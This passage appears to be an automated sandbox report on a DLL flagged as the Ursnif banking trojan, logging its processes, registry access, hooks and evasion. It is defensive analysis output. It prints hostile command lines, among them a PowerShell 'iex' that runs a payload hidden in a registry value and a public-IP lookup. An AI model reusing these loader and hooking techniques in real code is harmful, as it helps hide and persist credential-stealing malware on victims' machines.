            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: vnaSKDMnLG.dllStatic PE information: More than 246 > 100 exports found
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: vnaSKDMnLG.dllStatic PE information: More than 200 imports for kernel32.dll
            Source: vnaSKDMnLG.dllStatic PE information: More than 200 imports for user32.dll
            Source: vnaSKDMnLG.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdbXP source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
            Source: Binary string: %p'U:\tautologism\throatlet\pignoration\schorly\gansel\early.pdb source: regsvr32.exe
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000018.00000002.404055652.00000252B2A30000.00000002.00000001.sdmp, csc.exe, 0000001A.00000002.411630452.000001870CDE0000.00000002.00000001.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp
            Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdb source: powershell.exe, 00000016.00000002.479178421.0000020E9417E000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.429818290.0000000005E10000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.475607215.0000000006C40000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
            Source: Binary string: Y:\ruach\endeared\unroaded\warl\homolographic\palpableness.pdb source: regsvr32.exe, 00000001.00000002.484369961.0000000004930000.00000040.00000001.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000001F.00000002.447514159.000002090E7CC000.00000004.00000040.sdmp
            Source: Binary string: ;C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.pdbXP source: powershell.exe, 00000016.00000002.479298049.0000020E941EB000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.440194854.000000000DE20000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
            Source: q3xypckz.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x156e
            Source: vnaSKDMnLG.dllStatic PE information: real checksum: 0x42d78 should be: 0x3f8ff
            Source: chv50z53.dll.26.drStatic PE information: real checksum: 0x0 should be: 0x35c9
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A8B09B push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04A8ACE0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493009C push dword ptr [ebp-000000D8h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493009C push dword ptr [ebp-000000E0h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_0493009C push dword ptr [esp+10h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04930005 push dword ptr [ebp-000000D8h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_04930066 push dword ptr [ebp-000000D8h]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_049303AC push dword ptr [esp+0Ch]; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 1_2_049303AC push dword ptr [esp+10h]; ret
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.dll

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6968, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4360, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4760, type: MEMORY
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5743
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3025
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4404Thread sleep time: -7378697629483816s >= -30000s
